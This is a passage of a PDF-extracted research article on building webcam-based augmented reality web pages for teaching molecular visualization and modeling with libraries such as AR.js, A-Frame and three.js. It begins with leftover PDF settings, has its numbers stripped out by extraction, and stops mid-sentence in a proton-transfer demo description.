/dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers luciano a. abriata , École polytechnique fédérale de lausanne, lausanne, switzerland swiss institute of bioinformatics, lausanne, switzerland abstract for years, immersive interfaces using virtual and augmented reality (ar) for molecular visualization and modeling have promised a revolution in the way how we teach, learn, communicate and work in chemistry, structural biology and related areas. however, most tools available today for immersive modeling require specialized hardware and software, and are costly and cumbersome to set up. these limitations prevent wide use of immersive technologies in education and research centers in a standardized form, which in turn prevents large-scale testing of the actual effects of such technologies on learning and thinking processes. here, i discuss building blocks for creating marker-based ar applications that run as web pages on regular computers, and explore how they can be exploited to develop web content for handling virtual molecular systems in commodity ar with no more than a webcam- and internet-enabled computer. examples span from displaying molecules, electron microscopy maps and molecular orbitals with minimal amounts of html code, to incorporation of molecular mechanics, real-time estimation of experimental observables and other interactive resources using javascript. these web apps provide virtual alternatives to physical, plastic-made molecular modeling kits, where the computer augments the experience with information about spatial interactions, reactivity, energetics, etc. the ideas and prototypes introduced here should serve as starting points for building active content that everybody can utilize online at minimal cost, providing novel interactive pedagogic material in such an open way that it could enable mass-testing of the effect of immersive technologies on chemistry education. subjects bioinformatics, computational biology, human-computer interaction, multimedia keywords molecular modeling, integrative modeling, virtual reality, augmented reality, chemistry, education, molecular visualization introduction for a long time it has been suggested that visual immersive analytics based in virtual reality (vr), augmented reality (ar) and other advanced forms of human-computer interactions have enormous potential in assisting thinking processes in scientific research and in education, especially in areas of science that deal with abstract objects, objects much smaller or larger than human dimensions, objects that are hard to acquire and handle due to high costs, scarcity or fragility, and very large amounts of data (o’donoghue et al., ; matthews, ; krichenbauer et al., ; sommer et al., ). chemistry and how to cite this article abriata la. . building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted january published february corresponding author luciano a. abriata, luciano.abriata@epfl.ch academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright abriata distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:luciano.�abriata@�epfl.�ch https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ structural biology are examples of such disciplines where ar and vr have been attributed high potential in education and research, by providing hybrid physical/computational interfaces to handle and explore virtual molecules in real d space augmented with real-time overlay of information from databases and calculations. however, the actual impact of immersive technologies on teaching, learning and working in chemistry still requires deep evaluation (fjeld & voegtli, ; pence, williams & belford, ; matthews, ; bach et al., ; yang, mei & yue, ). such evaluation has progressed very slowly due to the complex software setups and the specialized hardware needed, which limit availability, reach, adoption, and thus testing. indeed this limitation is shared more broadly with other potential applications of ar and vr in science, which so far “[…] remain niche tools for scientific research” (matthews, ). in the last decade several groups have been studying ways to achieve immersive environments for chemistry and structural biology using vr and ar (gillet et al., , ; maier, tönnis & gudrunklinker, ; maier & klinker, ; hirst, glowacki & baaden, ; berry & board, ; martínez-hung, garcía-lópez & escalona-arranz, ; vega garzón, magrini & galembeck, ; balo, wang & ernst, ; goddard et al., a, b; wolle, müller & rauh, ; o’connor et al., ; ratamero et al., ; müller et al., ; stone, ). such interfaces allow handling molecules over degrees of freedom and with both hands, in immersive d. they are expected to overcome the limitations of traditional software based on screen, mouse and keyboard, thus enabling more intuitive, fluid exploration of molecular features and data. at the time of writing, most of these works are not complete ar or vr versions of fully-fledged programs, but rather prototypes, proofs of concept and case studies on how humans interact with virtual molecules in ar or vr. notable highlights moving towards complete immersive molecular visualization and modeling programs are the new rewrite of chimera, chimerax, which was optimized for the new gpus and incorporates support for vr experiences (goddard et al., b), vrmol (xu et al., ), new vr plugins for the vmd molecular graphics program (stone, ), and a few commercial programs like autodesk’s molecule viewer (https://autodeskresearch.com/groups/lifesciences) or nanome (https://nanome.ai/), all with interfaces specifically tailored for vr. most of these works suffer from two severe limitations. first, all but a few exceptions require hardware such as head-mount displays (helmets, headsets or goggles like ms hololens, oculus rift, htc vibe, etc.) or immersive installations with large surround screens plus d-handheld input devices and the corresponding computer and gpu hardware. the few remarkable exceptions are prototypes using ordinary webcam-enabled smartphones (balo, wang & ernst, ) or laptops (gillet et al., ). the second limitation is the need of specialized programs that often must be correctly interfaced to couple the different components required for an ar or vr experience, that is, tracking limbs, handheld devices or ar markers, then running calculations on molecular data, and finally displaying results and molecular graphics on screen (see ratamero et al., ; gillet et al., ). some of these programs are only compatible with specific vr devices and many are not free software. overall, then, despite the dropping costs, access to these tools still requires investment in the order of hundreds to low-thousand american dollars per abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://autodeskresearch.com/groups/lifesciences https://nanome.ai/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ user, and software interfacing that may not be available to lay students and teachers. it is therefore unlikely that vr will achieve the ideal of one device per student within the next few years. to date, these solutions are not widely used across the world, and their costs make them totally out of reach for educational centers in developing countries. additionally, most current setups are limited to vr, but it has been shown that ar is more suited for educational purposes because by not occluding the view of the user’s own limbs, it results in better motion coordination and object handling than vr (sekhavat & zarei, ; gaffary et al., ; krichenbauer et al., ). furthermore, in ar the view of the world is not obstructed thus allowing students and teachers to interact more easily. the purpose of this work is to demonstrate that client-side web technologies have matured enough to enable web pages for ar-based molecular visualization and modeling running just on web browsers in regular webcam-equipped computers. this enables the easy creation of immersive educational material that can be employed by students and teachers at very affordable costs and with very simple setups. all they must do is access a webpage, enable webcam activity in the browser, and show to the webcam a printed ar marker on which the molecules will be displayed. from the developer side, the code is made simple thanks to a large number of libraries; in fact visualization-only applications are achievable just with html code while interactivity can be incorporated through custom javascript. this article is organized in two parts. part provides a practical overview of the main building blocks available as of to program ar apps in web pages, with a focus on ways to achieve molecular visualization and modeling. it also briefly explores ways to handle gesture- and speech-based commands, molecular mechanics, calculation of experimental observables, concurrent collaboration through the world wide web, and other human- computer interaction technologies available in web browsers. part of the article showcases prototype web apps for specific tasks of practical utility in pedagogical and research settings. these web apps are based on open, commodity technology that requires only a modern browser “out of the box”, so educators, students and researchers are free to try out all these examples on their computers right away by following the provided links. part : overview of building blocks for immersive molecular modeling in web browsers virtual and augmented reality at the core of immersive experiences are visualizations based on vr or ar methods. while vr is probably best experienced with vr goggles to suppress any side view of the real world, ar is more amenable to devices like desktop or laptop computers, tablets and smartphones, making it better suited for commodity solutions, and has the additional advantages outlined in the introduction. the methods presented in this article make use of marker-based ar in a web-based setup that functions as an “ar mirror” where the user sees him/herself with the virtual objects, here molecules, overlaid on the markers he/she holds in their hands (figs. a and b). the following descriptions focus on this technology and how it can be implemented in web apps by using html, css and abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ javascript code as standard web pages that are hosted at servers but run entirely on local computers (fig. c). the webgl api provides powerful d and d graphing capabilities using gpu resources, in a format fully integrable with other html elements, apis and javascript libraries, without the need of plug-ins; and is highly standardized across browsers. it is thus possible to couple all elements required to build up an ar experience directly inside the web page source code. a handful of javascript libraries exploit webgl to facilitate rendering of d scenes, three.js (https://threejs.org/) being probably the most widely used. in turn, tools like a-frame (https://aframe.io/) provide entity component system frameworks that wrap three.js into html language tags through polyfills, greatly facilitating the development of ar and vr scenes. the examples presented in part showcase either direct use of three.js or of three.js through a-frame for ar. these libraries/frameworks can be used either by (i) loading pre-made models of the molecular figure commodity augmented reality in web browsers. (a) ar markers “hiro” and “kanji” are built into ar.js and its a-frame wrap. figure s shows them ready to print at various sizes. custom markers including cube markers are also implementable. (b) in the proposed web apps the ar library feeds coordinate information to the graphics libraries and other algorithms. (c) the web pages must be hosted in servers compatible with the https protocol, but their content then runs exclusively on the computer. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://threejs.org/ https://aframe.io/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ systems in formats like wavefront’s obj+mtl files exported straight out of molecular visualization programs like vmd (humphrey, dalke & schulten, ), unitymol (doutreligne et al., ; wiebrands et al., ), chimerax (goddard et al., b), etc., possibly further edited with a program like blender as in martínez-hung, garcía-lópez & escalona-arranz ( ); or (ii) employing d primitives (like spheres, cylinders, etc.) to draw the molecular systems from scratch with their atomic coordinates. use of wavefront models is much simpler (only a few lines of html code to load and display objects) and allows seamless display of any element exported from molecular graphics programs, including not only different representations of molecules but also isosurfaces as those needed to visualize volumetric data describing molecular orbitals, electron microscopy maps, etc. on the other hand, using d primitives requires larger pieces of code to create all d objects from atomic coordinates, but in turn allows for fine dynamic control of shapes, sizes, colors, and positions, which are key to interactivity. another downside of wavefront models is that files can become quite large for high-resolution textures. object detection and tracking the other key component required for ar and vr is a means to detect and track objects or parts of the user’s body such as his/her hands, in order to manipulate virtual objects. applications using ad hoc hardware use sensors and cameras that track the user’s position in space and handheld controllers that the user sees as virtual tweezers or hands, to directly move objects in space. for commodity ar/vr in web browsers, solutions rely on javascript versions of tracking libraries that implement computer vision algorithms through the webcam feed, like artoolkit (kato, ) among other similar solutions. these libraries track user-defined d markers (like those in fig. a; figs. s and s ) in space and make their computed coordinates available to the graphics algorithms. two especially interesting libraries, used in many of the examples presented in part , are ar.js (https://github.com/jeromeetienne/ar.js) and its a-frame wrap (https://jeromeetienne. github.io/ar.js/aframe/). these enable highly simplified ar/vr, even using exclusively html code for simple developments. it is important to note that in marker-based ar different viewers looking at the same physical marker receive different perspectives of it and hence of the rendered virtual object, just as if it was a real object in real space (fig. s ). this easily enables multi-user ar in a common room, as would be useful in a classroom setting where students and teachers look at the same virtual molecule. an alternative to traditional marker-based ar should in principle be possible by using a plain hand tracking javascript library like handtracking.js. another slightly more expensive approach but possibly better in tracking performance is using a device like the infrared-based leap motion controller (https://www.leapmotion.com/), which includes a javascript library to feed positional information from the device into the web app. unfortunately, however, there are currently no ready-to-use libraries that couple these input tools to webgl graphics, so their use would require further developments. current javascript libraries for computer vision allow even more complex object tracking. one interesting example is gesture recognition by the webgazer.js library, which abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- https://github.com/jeromeetienne/ar.js https://jeromeetienne.github.io/ar.js/aframe/ https://jeromeetienne.github.io/ar.js/aframe/ http://dx.doi.org/ . /peerj-cs. /supp- https://www.leapmotion.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ analyzes face features to estimate where on the screen the user is looking at (papoutsaki et al., ). in molecular visualization, this can be used for example to automatically rotate regions of interest to the front of the field of view, as shown in fig. s . speech-based interfaces a speech-based interface can be very useful for situations in which the user’s hands are busy holding objects, as in ar/vr applications. in-browser speech recognition apis enable implementation of speech recognition very easily, especially through libraries like annyang (ater, ) which is used in some of the examples of this article. these libraries usually allow working in two modes, one where the browser waits for specific commands (while accepting variable arguments) and one where the browser collects large amounts of free text that are then made available to the environment. the former allows direct activation of functions without the need for the user to click on the screen. the second option opens up the possibility of automatically detecting subjects, actions and concepts that are fed to artificial intelligence routines, or just predefined rules, that the computer will analyze in background. for example, when two users are discussing the interaction surface between two proteins and mention certain residues, the computer could automatically mine nih’s pubmed repository of papers for mentions of said residues. this may seem far-fetched, but is essentially the same technology that underlies automatic advertising and suggestions based on users’ various inputs and usage statistics in software and websites. the problem of intelligently suggesting chemical and biological information related to a topic or object has already been addressed for some time, for example in information augmentation tools like reflect (pafilis et al., ) and advanced text-mining tools (rebholz-schuhmann, oellrich & hoehndorf, ). the evolution of science-related standards are very important in this regard, formats and content for the semantic web (hendler, ) and of machine-readable scientific databases and ontologies that standardize knowledge and data. intensive calculations as recently reviewed in a dedicated issue of computing and science in engineering (dipierro, ), javascript has become very powerful by including language subsets specialized for speed, optimized just-in-time compilation, methods to program background scripts, and libraries to perform multi-core and on-gpus computing to accelerate intensive calculations. it is in fact now possible to transpile from c/c++ and other languages directly to javascript retaining close-to-native execution speeds, allowing web browsers to support quite complex data analysis and visualization directly in web pages (abriata et al., ; abriata, a). this opens up the possibility of simulating molecular mechanics and experimental data, performing numerical data analysis and even handling data in neural networks, directly inside the molecular modeling web app to enable real-time feedback as the user manipulates the molecular systems. some of the prototypes presented in part include such examples. rather than manually implementing calculations, a number of libraries are now available for specific applications that help to save code writing time and bring the abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional advantage of being developed by specialists (abriata, a). one particularly useful library in the scope of this paper is cannon.js (https://schteppe.github.io/cannon.js/), an engine for simulating rigid body mechanics that integrates smoothly with three.js and a-frame. these engines use numerical methods to propagate motions of solid bodies connected by springs and other physical constraints in an approximate but efficient way, thus adding realistic physics to the d bodies of ar and vr worlds. although these engines do not account for all the forces and phenomena of the atomic realm, such as electrostatic interactions and quantum phenomena, they are useful in certain real scenarios of molecular modeling. for example, the integrative modeling platform software (used to put together partial structures into bigger assemblies, driven by experimental data) includes one such kind of physics engine for molecule-molecule docking (russel et al., ). furthermore, implementation of more complex force fields is certainly possible, as exemplified by a javascript transpilation of the openmd molecular dynamics engine (jiang & jin, ). further building blocks any other technology that facilitates interaction with the computer within a d environment, either to deliver or obtain information, might be of use. for example, haptic feedback would be desirable to confer a physical feel of interactions and clashes as in (wollacott & merz, ; stocks, hayward & laycock, ; stocks, laycock & hayward, ; matthews et al., ). achieving a good experience in haptic feedback currently requires specialized devices, and is an area of active research (bolopion et al., , ), therefore it does not fit with the commodity hardware criteria outlined in the introduction. other rudimentary ways to achieve sensory feedback include exploiting built-in vibration devices and touch-pressure sensing in touch screens, both handled by javascript apis. finally, a particularly interesting aspect of software running on web browsers is the ease with which different users can connect to each other, just over the internet. web apps can exploit web sockets to achieve direct browser-to-browser links over which data can be transmitted freely, with a server only intervening to establish the initial connection (pimentel & nickerson, ). for example, two or more users can concurrently work on a jsmol session by sharing just mouse rotations and commands, appearing on all other users’ screens with a minor delay (abriata, b). such collaborative working technology could be adapted to complex immersive environments to allow multiple users to work on chemical problems at a distance, essential for scientific collaborations, demonstrations, and online teaching (lee, kim & kang, ). part : prototype web apps showcasing example applications this section presents example ar web apps compatible with major web browsers in modern computers, introducing features of increasing complexity. all examples were verified to run out of the box in multiple web browsers on windows, linux and macos operating systems, in laptop and desktop computers. all the examples are accessible through links in table and at https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html, which abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://schteppe.github.io/cannon.js/ https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ further contains links to demo videos. to run these examples the user needs to print the hiro, kanji or cube markers as needed in each case (fig. a; figs. s and s , and links on web pages). for simpler handling, flat markers (hiro and kanji) may be glued on a flat surface mounted on a device that can be easily rotated from the back, such as a small shaft perpendicular to the marker plane. the cube marker is printed in a single page, folded and possibly glued to a solid cube made of wood, plastic, rubber or similar material. readers interested in the inner workings and in developing content can inspect the source code of each webpage (ctrl+u or cmd+u in most browsers). several recommendations and basic troubleshooting for developers and users are given in table . introducing web browser-based ar for visualization the simplest way to achieve ar in web pages consists in displaying on the ar markers representations exported from programs like vmd (humphrey, dalke & schulten, ) in wavefront (obj+mtl) format. this can be achieved with a few lines of html code thanks to libraries like ar.js for a-frame, enabling the very easy creation of content for displaying any kind of object handled by the exporting program. figure a exemplifies this with a small molecule, -bromo-butane, shown as balls and sticks. this small molecule is chiral at carbon ; the hiro marker displays its r enantiomer while the kanji marker displays the s enantiomer, both rendered from the same pair of obj+mtl files but scaled as required for chirality inversion. figure b shows on the hiro marker a protein table links to all web examples arranged by figure. see https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html for an online version of the table which also includes links to several video demonstrations. figure a https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ brbutane.html b and c https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/pdb- vyq- fjl.html d https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bacteriophage.html e https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/xray hyd.html f https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bh nh orb.html g https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinandnesatomistic.html h https://lucianoabriata.altervista.org/jsinscience/arjs/jsartoolkit /pdbloader .html figure a https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolclashdetection.html and https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolprotontransfer.html b https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmoldielsalder.html c https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/metmyoglobinfe pcshift.html figure a https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinuimffvoicesaxs.html b https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/coevol_ qop.html figure a– c https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitin-uim-cannon.html abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- https://lucianoabriata.altervista.org/papersdata/tablepeerjcs .html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ brbutane.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/pdb- vyq- fjl.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bacteriophage.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/xray hyd.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bh nh orb.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinandnesatomistic.html https://lucianoabriata.altervista.org/jsinscience/arjs/jsartoolkit /pdbloader .html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolclashdetection.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolprotontransfer.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmoldielsalder.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/metmyoglobinfe pcshift.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinuimffvoicesaxs.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/coevol_ qop.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitin-uim-cannon.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ complex rendered as cartoons with small molecule ligands rendered as sticks (pdb id vyq, same example used by berry & board ( )); and fig. shows a cartoon representation of a protein bound to a short segment of double stranded dna rendered as sticks (from pdb id fjl) spinning on the kanji marker. figure d exemplifies display of vmd isosurfaces to show a volumetric map of a bacteriophage attached to its host as determined through electron microscopy (emdb id ). two further examples feature combined representations of atomic structure and volumetric data: fig. e shows a small peptide rendered as sticks and docked inside the experimental electron map shown as a mesh (from pdb id hyd), and fig. f shows the frontier molecular orbitals of bh and nh (from wavefront files kindly provided by g. frattini and prof. d. moreno, iquir, argentina). the next level of complexity is building up scenes from d primitives, which brings the advantage over ready-made models that all the elements can be handled independently, thus allowing the possibility of incorporating interactivity. this can be achieved either through a-frame with ar.js, thus requiring only html code for display as in the wavefront-based examples above, or through libraries that require additional javascript code but in turn enable more complex functionalities. exemplifying the former case, table requirements and troubleshooting for developers and users. developers software and hardware requirements * ensure using https urls; otherwise webcams will not activate. * free web hosting services work, as web pages only need to be hosted but run in the client. * given the regular updates in w c standards, apis and libraries, routine tests are recommended to ensure normal functioning. * examples from this paper were verified to work “out of the box” on safari in multiple macos .x versions and on multiple chrome and firefox versions in windows , windows , linux redhat enterprise edition, ubuntu and archlinux. * currently limited and heterogeneous support in tablets and smartphones, these devices are not recommended. users software and hardware requirements * need a webcam- and internet-enabled computer (desktop or laptop). * enable webcam when prompted. * javascript and webgl must be enabled in the browser (that is a default setting). * check that ad blockers and firewalls do not block the webcam and other content. * pages containing large wavefront files may take time to load (half to a few minutes). augmented reality markers * print on regular printer; try different sizes for different applications. * when using hiro and kanji markers ensure they are printed at the same size. * ensure that makers have a white frame around the black drawing, at least % of size. * to improve marker recognition, avoid glossy papers. opaque paper is best. * lighting may also affect the quality of the ar experience. * markers are easier to handle if glued on solid surfaces (but avoid wrinkles). * cubic marker can be glued on solid rubber cube cut to appropriate size. abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fig. g uses a-frame spheres and cylinders placed at coordinates computed from atomic positions, colored by atom type and assigned atom-specific radii, to render a model of a small protein helix on the kanji marker. the latter case of using pure javascript is figure different implementations of webgl for ar in web browsers. (a) -bromo-butane enantiomers r and s displayed on hiro and kanji markers, respectively, from wavefront objects pro- duced in vmd. (b) a protein complex rendered as cartoons with small molecule ligands shown as sticks on the hiro marker (pdb id vyq). (c) a double-stranded segment of dna (sticks) bound to a homeodomain protein (cartoon) spinning on the kanji marker (pdb id fjl). both b and c were rendered from vmd wavefront objects. (d) volumetric map of a bacteriophage attached to a portion of the host’s cell wall as determined through electron microscopy (emdb id ) and prepared as vmd wavefront object showing the capsid in gray, the needle in blue and the membranes in orange. (e) a small peptide inside its electron density map as determined by x-ray diffraction (pdb id hyd). (f) homo and lumo orbitals from nh and bh molecules, rendered from wavefront objects. (g) representation of an amphipathic alpha helix built from primitives, viewable on the kanji marker. (h) use of a cube marker (made up of six different ar markers in its faces) to load any molecule in pdb format and handle and visualize it in d. graphics built from three.js primitives. the example also uses cannon.js to simulate rigid body dynamics by fixing the distances between atoms separated by one or two bonds but allowing rotations, in analogy to plastic-made molecular modeling kits. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ illustrated by the jsartoolkit library (https://github.com/artoolkit/jsartoolkit ), in an example where six markers arranged on the faces of a cube are coupled to drive a single object in full d. lastly, combining this with direct use of three.js to draw d primitives, the web app in fig. h allows visualization and manipulation of any molecule loaded in pdb format in full d, in this case (d)-glucopyranose. adding interactivity: examples on small molecules web apps using a-frame can gain interactivity through portions of javascript code that read atom coordinates and carry out calculations on them. figure shows another series of examples of increasing complexity, focusing on small molecules. in fig. a, the user drives a lysine side chain with the hiro marker and a glutamate side chain with the kanji marker. each molecule is anchored to the center of its corresponding ar marker through its alpha carbon atom. their protonation states correspond to neutral ph, so lysine is protonated hence its n atom (blue) is charged by + , whereas glutamate is deprotonated hence its o atoms (red) bear a total charge of − . through simple javascript code the web app (i) represents with yellow dots the vector connecting the lysine’s n atom and one of the glutamate’s o atoms; (ii) reports the distance between these atoms and the corresponding attractive electrostatic force in real time; and (iii) checks for and displays clashes between any pair of atoms of the two molecules. the code for (i) is wrapped inside figure introducing interactivity. (a) a lysine and a glutamate side chain attached to different ar markers, whose coordinates are processed in real time to deliver distance and electrostatic potential between charged groups and to calculate and display clashes. graphics achieved with a-frame polyfills. in this example the ratio of protonated lysine to glutamate exchanging dynamically is set to / = . , that is, favoring protonated lysine as the actual water chemistry dictates but shifted orders of magnitude from the real ratio of acidic constants so that the user can observe temporal protonation of both amino acids in the timescale of work. (b) a diels-alder reaction, taking place once the user has moved the reagents close enough in space; this example further helps to visualize fused cycles (as the diene reagent was a cyclic molecule itself). (c) example of interactively probing experimental observables: as a probe atom (black sphere) is moved around a paramagnetic center, the user sees the paramagnetic effects simulated at the location of the probe atom in real time. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/artoolkit/jsartoolkit http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an auxiliary .js file, and the code for (ii) and (iii) is located between <script> tags at the end of the html file. the distance, electrostatic and clash calculations are computed inside a setinterval() function every ms, and use the id attribute of the sphere tags to locate the atomic coordinates. the distance calculation includes a correction for a zoom factor that scales atom sizes and positions when the molecular coordinates are parsed into a-frame html to properly fit the screen. clashes are detected when two spheres are within Å and displayed as semitransparent a-frame spheres centered on the affected atoms. a modified version of this example is also provided, incorporating a very simplistic emulation of hydrogen bond detection and proton transfer (second link for fig. a in table ). javascript code calculates and displays hydrogen bonds when the geometry permits, and randomly “transfers” one proton from lysine’s n atom to one of the o atoms of glutamate if the lysine is protonated, or the other way around (actually spheres attached to 